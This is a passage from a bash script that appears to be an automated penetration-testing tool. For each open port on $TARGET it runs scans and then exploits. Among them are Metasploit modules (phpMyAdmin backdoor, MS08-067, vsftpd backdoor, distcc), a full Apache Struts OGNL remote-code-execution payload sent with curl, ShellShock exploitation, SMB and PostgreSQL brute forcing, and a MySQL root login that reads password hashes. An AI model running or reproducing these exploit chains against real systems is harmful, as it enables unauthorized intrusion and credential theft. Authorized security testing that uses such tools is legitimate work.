 996 |   curl -s --insecure -I http://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10
 997 |   echo ""
 998 |   echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
 999 |   curl -s --insecure http://$TARGET/robots.txt | tail -n 10
1000 |   echo ""
1001 |   echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
1002 |   curl -s --insecure http://$TARGET/sitemap.xml | tail -n 10
1003 |   echo ""
1004 |   echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
1005 |   curl -s --insecure -I http://$TARGET | egrep -i "Cookie:" | tail -n 10
1006 |   echo ""
1007 |   echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
1008 |   curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
1009 |   curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
1010 |   echo ""
1011 |   echo -e "$RESET"
1012 |   echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
1013 |   nikto -h http://$TARGET
1014 |   echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
1015 |   echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
1016 |   if [ ${DISTRO} == "blackarch"  ]; then
1017 |     /bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
1018 |   else
1019 |     cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
1020 |   fi
1021 |   if [ "$MODE" = "web" ];
1022 |   then
1023 |     echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
1024 |     echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
1025 |     nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
1026 |     echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
1027 |     dirb http://$TARGET
1028 |     echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
1029 |     wpscan --url http://$TARGET --batch
1030 |     echo ""
1031 |     wpscan --url http://$TARGET/wordpress/ --batch
1032 |     echo ""
1033 |     echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET"
1034 |     python $CMSMAP -t http://$TARGET
1035 |     echo ""
1036 |     python $CMSMAP -t http://$TARGET/wordpress/
1037 |     echo ""
1038 |     echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
1039 |     mkdir -p $INSTALL_DIR/loot/web/$TARGET-http/ 2> /dev/null
1040 |     arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-http/ --output-only-positives http://$TARGET
1041 |     cd $INSTALL_DIR/loot/web/$TARGET-http/
1042 |     arachni_reporter $INSTALL_DIR/loot/web/$TARGET-http/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
1043 |     unzip $INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
1044 |     cd $INSTALL_DIR
1045 |     echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
1046 |     sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
1047 |     echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
1048 |     msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
1049 |     echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
1050 |     python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
1051 |     echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
1052 |     curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
1053 |   fi
1054 | 
1055 |   if [ $SCAN_TYPE == "DOMAIN" ];
1056 |   then
1057 |     if [ "$GOOHAK" = "0" ]; then
1058 |       echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
1059 |     else
1060 |       echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
1061 |       goohak $TARGET > /dev/null
1062 |     fi
1063 |     echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
1064 |     php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
1065 |     rm -Rf output/ cookie.txt exploits.conf
1066 |     GHDB="1"
1067 |   fi
1068 | fi
1069 | 
1070 | if [ -z "$port_110" ];
1071 | then
1072 |   echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
1073 | else
1074 |   echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
1075 |   nmap -A -sV  -T5 --script=pop* -p 110 $TARGET
1076 | fi
1077 | 
1078 | if [ -z "$port_111" ];
1079 | then
1080 |   echo -e "$OKRED + -- --=[Port 111 closed... skipping.$RESET"
1081 | else
1082 |   echo -e "$OKORANGE + -- --=[Port 111 opened... running tests...$RESET"
1083 |   showmount -a $TARGET
1084 |   showmount -d $TARGET
1085 |   showmount -e $TARGET
1086 | fi
1087 | 
1088 | if [ -z "$port_135" ];
1089 | then
1090 |   echo -e "$OKRED + -- --=[Port 135 closed... skipping.$RESET"
1091 | else
1092 |   echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET"
1093 |   rpcinfo -p $TARGET
1094 |   nmap -A -p 135 -T5 --script=rpc* $TARGET
1095 | fi
1096 | 
1097 | if [ -z "$port_139" ];
1098 | then
1099 |   echo -e "$OKRED + -- --=[Port 139 closed... skipping.$RESET"
1100 | else
1101 |   echo -e "$OKORANGE + -- --=[Port 139 opened... running tests...$RESET"
1102 |   SMB="1"
1103 |   echo -e "$OKGREEN + -- ----------------------------=[Running SMB Enumeration]=----------------- -- +$RESET"
1104 |   enum4linux $TARGET
1105 |   python $SAMRDUMP $TARGET
1106 |   nbtscan $TARGET
1107 |   nmap -A -sV  -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
1108 |   msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
1109 | fi
1110 | 
1111 | if [ -z "$port_161" ];
1112 | then
1113 |   echo -e "$OKRED + -- --=[Port 161 closed... skipping.$RESET"
1114 | else
1115 |   echo -e "$OKORANGE + -- --=[Port 161 opened... running tests...$RESET"
1116 |   for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
1117 |   nmap -sU -p 161 --script=snmp* $TARGET
1118 | fi
1119 | 
1120 | if [ -z "$port_162" ];
1121 | then
1122 |   echo -e "$OKRED + -- --=[Port 162 closed... skipping.$RESET"
1123 | else
1124 |   echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET"
1125 |   for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
1126 |   nmap -A -p 162 -Pn --script=snmp* $TARGET
1127 | fi
1128 | 
1129 | if [ -z "$port_389" ];
1130 | then
1131 |   echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET"
1132 | else
1133 |   echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET"
1134 |   nmap -A -p 389 -Pn -T5 --script=ldap* $TARGET
1135 | fi
1136 | 
1137 | if [ -z "$port_443" ];
1138 | then
1139 |   echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
1140 | else
1141 |   echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
1142 |   echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
1143 |   wafw00f https://$TARGET
1144 |   echo ""
1145 |   echo -e "$OKGREEN + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +$RESET"
1146 |   cd $PLUGINS_DIR/CloudFail/
1147 |   python3 cloudfail.py --target $TARGET
1148 |   cd $INSTALL_DIR
1149 |   echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
1150 |   whatweb https://$TARGET
1151 |   echo ""
1152 |   echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
1153 |   sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
1154 |   sslscan --no-failed $TARGET
1155 |   testssl $TARGET
1156 |   echo ""
1157 |   if [ $DISTRO == "blackarch" ]; then
1158 |     massbleed $TARGET port 443
1159 |   else
1160 |     cd $PLUGINS_DIR/MassBleed
1161 |     ./massbleed $TARGET port 443
1162 |   fi
1163 |   cd $INSTALL_DIR
1164 |   echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET"
1165 |   echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
1166 |   curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10
1167 |   echo ""
1168 |   echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
1169 |   curl -s --insecure -I https://$TARGET | egrep -i 'X-Frame' | tail -n 10
1170 |   echo ""
1171 |   echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
1172 |   curl -s --insecure -I https://$TARGET | egrep -i 'X-XSS' | tail -n 10
1173 |   echo ""
1174 |   echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
1175 |   curl -s --insecure -I -X OPTIONS https://$TARGET | grep Allow
1176 |   echo ""
1177 |   echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
1178 |   curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE
1179 |   echo ""
1180 |   echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
1181 |   curl -s --insecure https://$TARGET | egrep -i meta --color=auto | tail -n 10
1182 |   echo ""
1183 |   echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
1184 |   curl -x https://$TARGET:443 -L https://google.com -s --insecure | tail -n 10
1185 |   echo ""
1186 |   echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
1187 |   curl -s --insecure -I https://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
1188 |   echo ""
1189 |   echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
1190 |   curl -s --insecure -I https://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10
1191 |   echo ""
1192 |   echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
1193 |   curl -s --insecure https://$TARGET/crossdomain.xml | tail -n 10
1194 |   echo ""
1195 |   echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
1196 |   curl -s --insecure https://$TARGET/clientaccesspolicy.xml | tail -n 10
1197 |   echo ""
1198 |   echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
1199 |   curl -s --insecure -I https://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10
1200 |   echo ""
1201 |   echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
1202 |   curl -s --insecure https://$TARGET/robots.txt | tail -n 10
1203 |   echo ""
1204 |   echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
1205 |   curl -s --insecure https://$TARGET/sitemap.xml | tail -n 10
1206 |   echo ""
1207 |   echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
1208 |   curl -s --insecure -I https://$TARGET | egrep -i "Cookie:" | tail -n 10
1209 |   echo ""
1210 |   echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
1211 |   curl -s --insecure https://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
1212 |   curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
1213 |   echo ""
1214 |   echo -e "$RESET"
1215 |   echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
1216 |   nikto -h https://$TARGET
1217 |   echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
1218 |   if [ ${DISTRO} == "blackarch"  ]; then
1219 |     /bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
1220 |   else
1221 |     cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
1222 |   fi
1223 |   echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
1224 | 
1225 |   if [ "$MODE" = "web" ];
1226 |   then
1227 |     echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
1228 |     nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
1229 |     echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
1230 |     dirb https://$TARGET
1231 |     echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
1232 |     wpscan --url https://$TARGET --batch
1233 |     echo ""
1234 |     wpscan --url https://$TARGET/wordpress/ --batch
1235 |     echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET"
1236 |     python $CMSMAP -t https://$TARGET
1237 |     echo ""
1238 |     python $CMSMAP -t https://$TARGET/wordpress/
1239 |     echo ""
1240 |     if [ $ARACHNI == "1" ];
1241 |     then
1242 |       echo -e "$OKGREEN + -- ----------------------------=[Skipping Arachni Scan]=------------------- -- +$RESET"
1243 |     else
1244 |       echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
1245 |       mkdir -p $INSTALL_DIR/loot/web/$TARGET-https/ 2> /dev/null
1246 |       arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-https/ --output-only-positives https://$TARGET
1247 |       cd $INSTALL_DIR/loot/web/$TARGET-https/
1248 |       arachni_reporter $INSTALL_DIR/loot/web/$TARGET-https/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
1249 |       unzip $INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
1250 |       cd $INSTALL_DIR
1251 |     fi
1252 |     echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
1253 |     sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
1254 |     echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
1255 |     msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
1256 |     echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
1257 |     python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
1258 |     echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
1259 |     curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
1260 |   fi
1261 | 
1262 |   if [ $SCAN_TYPE == "DOMAIN" ];
1263 |   then
1264 |     if [ -z $GHDB ];
1265 |     then
1266 |       if [ "$GOOHAK" = "0" ]; then
1267 |         echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
1268 |       else
1269 |         echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
1270 |         goohak $TARGET > /dev/null
1271 |       fi
1272 |       echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
1273 |       php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
1274 |       rm -Rf output/ cookie.txt exploits.conf
1275 |     fi
1276 |   fi
1277 | fi
1278 | 
1279 | if [ -z "$port_445" ];
1280 | then
1281 |   echo -e "$OKRED + -- --=[Port 445 closed... skipping.$RESET"
1282 | elif [ $SMB = "1" ];
1283 | then
1284 |   echo -e "$OKRED + -- --=[Port 445 scanned... skipping.$RESET"
1285 | else
1286 |   echo -e "$OKORANGE + -- --=[Port 445 opened... running tests...$RESET"
1287 |   enum4linux $TARGET
1288 |   python $SAMRDUMP $TARGET
1289 |   nbtscan $TARGET
1290 |   nmap -A -sV -Pn -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
1291 |   msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
1292 | fi
1293 | 
1294 | if [ -z "$port_512" ];
1295 | then
1296 |   echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET"
1297 | else
1298 |   echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET"
1299 |   nmap -A -sV -Pn -T5 -p 512 --script=rexec* $TARGET
1300 | fi
1301 | 
1302 | if [ -z "$port_513" ]
1303 | then
1304 |   echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET"
1305 | else
1306 |   echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET"
1307 |   nmap -A -sV -T5 -Pn -p 513 --script=rlogin* $TARGET
1308 | fi
1309 | 
1310 | if [ -z "$port_514" ];
1311 | then
1312 |   echo -e "$OKRED + -- --=[Port 514 closed... skipping.$RESET"
1313 | else
1314 |   echo -e "$OKORANGE + -- --=[Port 514 opened... running tests...$RESET"
1315 |   amap $TARGET 514 -A
1316 | fi
1317 | 
1318 | if [ -z "$port_623" ];
1319 | then
1320 |   echo -e "$OKRED + -- --=[Port 623 closed... skipping.$RESET"
1321 | else
1322 |   echo -e "$OKORANGE + -- --=[Port 623 opened... running tests...$RESET"
1323 |   amap $TARGET 623 -A
1324 |   nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 623 $TARGET
1325 | fi
1326 | 
1327 | if [ -z "$port_624" ];
1328 | then
1329 |   echo -e "$OKRED + -- --=[Port 624 closed... skipping.$RESET"
1330 | else
1331 |   echo -e "$OKORANGE + -- --=[Port 624 opened... running tests...$RESET"
1332 |   amap $TARGET 624 -A
1333 |   nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 624 $TARGET
1334 | fi
1335 | 
1336 | if [ -z "$port_1099" ];
1337 | then
1338 |   echo -e "$OKRED + -- --=[Port 1099 closed... skipping.$RESET"
1339 | else
1340 |   echo -e "$OKORANGE + -- --=[Port 1099 opened... running tests...$RESET"
1341 |   amap $TARGET 1099 -A
1342 |   nmap -A -sV -Pn -T5 -p 1099 --script=rmi-* $TARGET
1343 |   msfconsole -x "use gather/java_rmi_registry; set RHOST "$TARGET"; run;"
1344 |   msfconsole -x "use scanner/misc/java_rmi_server; set RHOST "$TARGET"; run;"
1345 | fi
1346 | 
1347 | if [ -z "$port_1433" ];
1348 | then
1349 |   echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
1350 | else
1351 |   echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
1352 |   nmap -A -sV -Pn -T5 --script=ms-sql* -p 1433 $TARGET
1353 | fi
1354 | 
1355 | if [ -z "$port_2049" ];
1356 | then
1357 |   echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
1358 | else
1359 |   echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
1360 |   nmap -A -sV -Pn -T5 --script=nfs* -p 2049 $TARGET
1361 |   rpcinfo -p $TARGET
1362 |   showmount -e $TARGET
1363 |   smbclient -L $TARGET -U " "%" "
1364 | fi
1365 | 
1366 | if [ -z "$port_2121" ];
1367 | then
1368 |   echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
1369 | else
1370 |   echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
1371 |   nmap -A -sV -Pn -T5 --script=ftp* -p 2121 $TARGET
1372 |   msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
1373 | fi
1374 | 
1375 | if [ -z "$port_3306" ];
1376 | then
1377 |   echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
1378 | else
1379 |   echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
1380 |   nmap -A -sV -Pn --script=mysql* -p 3306 $TARGET
1381 |   mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
1382 | fi
1383 | 
1384 | if [ -z "$port_3310" ];
1385 | then
1386 |   echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
1387 | else
1388 |   echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
1389 |   nmap -A -p 3310 -Pn -T5 -sV  --script clamav-exec $TARGET
1390 | fi
1391 | 
1392 | if [ -z "$port_3128" ];
1393 | then
1394 |   echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
1395 | else
1396 |   echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
1397 |   nmap -A -p 3128 -Pn -T5 -sV  --script=*proxy* $TARGET
1398 | fi
1399 | 
1400 | if [ -z "$port_3389" ];
1401 | then
1402 |   echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
1403 | else
1404 |   echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
1405 |   nmap -A -sV -Pn -T5 --script=rdp-* -p 3389 $TARGET
1406 |   rdesktop $TARGET &
1407 | fi
1408 | 
1409 | if [ -z "$port_3632" ];
1410 | then
1411 |   echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
1412 | else
1413 |   echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
1414 |   nmap -A -sV -Pn -T5 --script=distcc-* -p 3632 $TARGET
1415 |   msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
1416 | fi
1417 | 
1418 | if [ -z "$port_4443" ];
1419 | then
1420 |   echo -e "$OKRED + -- --=[Port 4443 closed... skipping.$RESET"
1421 | else
1422 |   echo -e "$OKORANGE + -- --=[Port 4443 opened... running tests...$RESET"
1423 |   wafw00f http://$TARGET:4443
1424 |   echo ""
1425 |   whatweb http://$TARGET:4443
1426 |   echo ""
1427 |   xsstracer $TARGET 4443
1428 |   sslscan --no-failed $TARGET:4443
1429 |   sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443
1430 |   cd $PLUGINS_DIR/MassBleed
1431 |   ./massbleed $TARGET port 4443
1432 |   cd $INSTALL_DIR
1433 |   nikto -h https://$TARGET:4443
1434 |   if [ ${DISTRO} == "blackarch"  ]; then
1435 |     /bin/CutyCapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
1436 |   else
1437 |     cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
1438 |   fi
1439 |   nmap -sV -Pn -A -p 4443 -T5 --script=*proxy* $TARGET
1440 | fi
1441 | 
1442 | if [ -z "$port_5432" ];
1443 | then
1444 |   echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
1445 | else
1446 |   echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
1447 |   nmap -A -sV -Pn --script=pgsql-brute -p 5432 $TARGET
1448 | fi
1449 | 
1450 | if [ -z "$port_5800" ];
1451 | then
1452 |   echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
1453 | else
1454 |   echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
1455 |   nmap -A -sV -Pn -T5 --script=vnc* -p 5800 $TARGET
1456 | fi
1457 | 
1458 | if [ -z "$port_5900" ];
1459 | then
1460 |   echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
1461 | else
1462 |   echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
